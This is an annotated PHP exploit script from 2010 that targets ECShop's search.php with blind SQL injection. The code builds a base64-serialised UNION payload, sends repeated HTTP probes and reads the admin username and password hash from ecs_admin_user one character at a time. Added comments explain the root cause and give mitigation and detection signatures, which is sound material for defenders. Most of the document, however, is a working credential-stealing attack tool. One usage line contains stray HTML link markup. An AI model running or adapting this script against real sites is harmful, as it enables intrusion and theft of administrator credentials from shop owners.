ECShop ҳSQLעExploit

ECShop ҳSQLעExploit  =>
 # Exploit Title: ECShop Search.php SQL Injection Exploit
 # Date: 2010-05-17
 # Author: Jannock
 # Software Link: http://www.ecshop.com
 # Version: ECShop All Version
 # Tested on:
 # CVE :
 # WAVDB: WAVDB-01606
 # Code :
  
 








<?php





002

// Script-wide settings for a long, request-by-request CLI run: no execution
// time limit, and error_reporting(7) = E_ERROR | E_WARNING | E_PARSE, so
// notices (for example from the uninitialised $reply in exploit()) are hidden.
ini_set("max_execution_time",0);
error_reporting(7);






 






/**
 * Prints the banner and command-line usage, then terminates the script.
 *
 * Reads the global $argv so the usage line shows the script's own name.
 * exit() with a string argument prints it and stops execution, so this
 * function never returns.
 */
function usage()
{
    global $argv;
    exit(
    "\n--+++============================================================+++--".
    "\n--+++====== ECShop Search.php SQL Injection Exploit========+++--".
    "\n--+++============================================================+++--".
    "\n\n[+] Author: jannock".
    // NOTE(review): the <a ...> markup on the next line is an artifact of the
    // page that rendered this listing (the URL was auto-linked); as pasted the
    // line is not valid PHP because of the unescaped double quotes.
    "\n[+] Team: <a href="http://wavdb.com/" target="_blank">http://wavdb.com/</a>".
    "\n[+] Usage: php ".$argv[0]." <hostname> <path> <goods_id>".
    "\n[+] Ex.: php ".$argv[0]." localhost / 1".
    "\n\n");
}






 






/**
 * Builds the value that is sent in search.php's `encode` query parameter.
 *
 * The script relies on search.php base64-decoding and unserialize()-ing that
 * parameter and then using the KEYS of the resulting `attr` array inside a SQL
 * statement without escaping. $chs selects which boolean condition is placed
 * in the injected text:
 *   0 - always true ("1=1");
 *   1 - one character of the first ecs_admin_user.user_name equals $chr;
 *   2 - one character of the first ecs_admin_user.password equals $chr;
 *   3 - the length of that user_name equals $pos.
 * Every condition only produces a true/false outcome (boolean-based blind
 * injection); the callers recognise the "true" case by finding the string
 * "javascript:addToCart" in the response.
 *
 * Defender notes: the root cause is request data being deserialised and then
 * interpolated into SQL. The mitigation is to never unserialize() request
 * input and to validate/parameterise attribute ids before they reach a query.
 * For detection, requests to search.php whose `encode` value base64-decodes
 * to a serialised array containing SQL keywords (union, select,
 * ecs_admin_user) identify this tool; the long run of near-identical
 * requests from one client that the callers generate is a second signal.
 *
 * @param int    $pos    1-based character position, or the candidate length
 *                       when $chs == 3
 * @param int    $chr    ASCII code of the candidate character (unused for 0/3)
 * @param int    $chs    condition selector, 0..3 (see above)
 * @param string $goodid goods_id used in the UNION SELECT; presumably so the
 *                       page renders a product row only when the condition
 *                       holds — not verifiable from this file
 * @return string base64 of the serialised array, with '+' replaced by '%2b'
 *                so it survives URL decoding of the query string
 */
function query($pos, $chr, $chs,$goodid)
{
    switch ($chs){
        case 0:
            $query = "1=1";
            break;
        case 1:
            // The literal spans two source lines; the embedded newline is part
            // of the text that is sent.
            $query = " ascii(substring((select user_name from ecs_admin_user limit
0,1),{$pos},1))={$chr}";
            break;
        case 2:
            $query = " ascii(substring((select password from ecs_admin_user limit
0,1),{$pos},1))={$chr}";
            break;
        case 3:
            $query = " length((select user_name from ecs_admin_user limit 0,1))={$pos}";
            break;
    }
    // The injected text is the array KEY; its value is just "1". The literal
    // again spans source lines, so the newline before "union" is sent as-is.
    $list=array("1' or 1=1) and 1=2 GROUP BY goods_id HAVING num = '1'
union select $goodid,1 from ecs_admin_user where 1=1 and ". $query
    ."/*"=>"1");
    $query = array("attr"=>$list);
    // serialize + base64 is the encoding search.php expects; '+' is escaped so
    // URL decoding does not turn it into a space.
    $query = str_replace('+', '%2b', base64_encode(serialize($query)));
    return $query;
}






 






/**
 * Sends one probe request and returns the raw HTTP response.
 *
 * Opens a plain TCP connection to port 80 (hard-coded, no TLS), issues
 * GET <path>/search.php?encode=<payload> over HTTP/1.1 with "Connection: Close"
 * and reads until the server closes the socket. The returned text (status
 * line, headers and body together) is what the callers search for
 * "javascript:addToCart".
 *
 * @param string     $hostname target host; also used for the Host header
 * @param string     $path     base path of the installation, e.g. "/"
 * @param int        $pos      forwarded to query()
 * @param string|int $chr      candidate character; converted with ord() below
 * @param int        $chs      forwarded to query()
 * @param string     $goodid   forwarded to query()
 * @return string the full HTTP response as read from the socket
 */
function exploit($hostname, $path, $pos, $chr, $chs,$goodid)
{
    // The server-side comparison is by ASCII code (see query()). For
    // $chs == 3 the caller passes int 0, which ord() reads as the string "0";
    // that value is not used by case 3.
    $chr = ord($chr);
    // The return value is not checked: on connection failure $conn is false
    // and the socket calls below fail instead of the script reporting it.
    $conn = fsockopen($hostname, 80);
    $message = "GET ".$path."/search.php?encode=".query($pos, $chr,
    $chs,$goodid)." HTTP/1.1\r\n";
    $message .= "Host: $hostname\r\n";
    $message .= "Connection: Close\r\n\r\n";
    fwrite($conn, $message);
    // $reply is never initialised; the first .= raises a notice that the
    // error_reporting(7) at the top of the file hides.
    while (!feof($conn))
    {
        $reply .= fgets($conn, 1024);
    }
    fclose($conn);
    return $reply;
}






 






 






/**
 * Recovers the first admin user_name one character at a time and echoes it.
 *
 * For each position 1..$length (a global set by lengthcolumns() in the main
 * script) every character of $key is tried in order; a response containing
 * "javascript:addToCart" means the server-side condition was true, so that
 * character is printed and the next position starts. Nothing bounds $chr, so
 * a character outside $key (for example an upper-case letter) keeps the loop
 * at the same position without ever advancing.
 *
 * @param string $hostname forwarded to exploit()
 * @param string $path     forwarded to exploit()
 * @param int    $chs      condition selector forwarded to query(); the main
 *                         script passes 1 (user_name characters)
 * @param string $goodid   forwarded to exploit()
 * @return void output goes to stdout
 */
function crkusername($hostname, $path, $chs,$goodid)
{
    global $length;
    // Lower-case letters and digits only; the comparison in query() is by
    // ASCII code, so case matters.
    $key = "abcdefghijklmnopqrstuvwxyz0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] username: ";
    while ($pos <= $length)
    {
        $response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);
        if (preg_match ("/javascript:addToCart/i", $response))
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n";
}






 






/**
 * Recovers the first admin password field one character at a time and echoes it.
 *
 * Same loop as crkusername(), but over a fixed 32 positions and the hex
 * alphabet — consistent with a 32-character hex digest (e.g. MD5) being stored
 * in ecs_admin_user.password, which this file does not itself confirm. The
 * oracle is again "javascript:addToCart" in the response, and as in
 * crkusername() nothing bounds $chr if no character of $key matches.
 *
 * @param string $hostname forwarded to exploit()
 * @param string $path     forwarded to exploit()
 * @param int    $chs      condition selector forwarded to query(); the main
 *                         script passes 2 (password characters)
 * @param string $goodid   forwarded to exploit()
 * @return void output goes to stdout
 */
function crkpassword($hostname, $path, $chs,$goodid)
{
    $key = "abcdef0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] password: ";
    while ($pos <= 32)
    {
        $response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);
        if (preg_match ("/javascript:addToCart/i", $response))
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n\n";
}






 






/**
 * Determines the length of the first admin user_name by probing 1, 2, ... 20.
 *
 * Each probe asks the server whether length(user_name) equals $pos (query()
 * case 3); the first response containing "javascript:addToCart" fixes the
 * length, which is echoed and returned. If no length up to 20 matches the
 * script terminates with "Exploit failed". The name "lengthcolumns" is
 * historical; only the user_name length is measured here.
 *
 * @param string $hostname forwarded to exploit()
 * @param string $path     forwarded to exploit()
 * @param int    $chs      condition selector forwarded to query(); the main
 *                         script passes 3
 * @param string $goodid   forwarded to exploit()
 * @return int the matched length (1..20); never returns 0 because the
 *             failure path calls exit()
 */
function lengthcolumns($hostname, $path,$chs, $goodid)
{
    echo "[+] username length: ";
    // $exit duplicates the break below; both are kept as written.
    $exit = 0;
    $length = 0;
    $pos = 1;
    // $chr is passed through but not used by query() case 3.
    $chr = 0;
    while ($exit==0)
    {
        $response = exploit($hostname, $path, $pos, $chr, $chs,$goodid);
        if (preg_match ("/javascript:addToCart/i", $response))
        {
            $exit = 1;
            $length = $pos;
            break;
        }
        else
        {
            $pos++;
            if($pos>20)
            {
                exit("Exploit failed");
            }
        }
    }
    echo $length."\n";
    return $length;
}






 






 






// Entry point. Exactly three arguments are expected (host, path, goods_id);
// otherwise usage() prints the help text and exits.
if ($argc != 4)
    usage();
$hostname = $argv[1];
$path = $argv[2];
$goodid = $argv[3];
// The third argument of each call is the $chs selector for query():
// 3 = user_name length, 1 = user_name characters, 2 = password characters.
// $length is a file-level variable that crkusername() reads via `global`.
$length = lengthcolumns($hostname, $path, 3, $goodid);
crkusername($hostname, $path, 1,$goodid);
crkpassword($hostname, $path, 2,$goodid);






 






?>
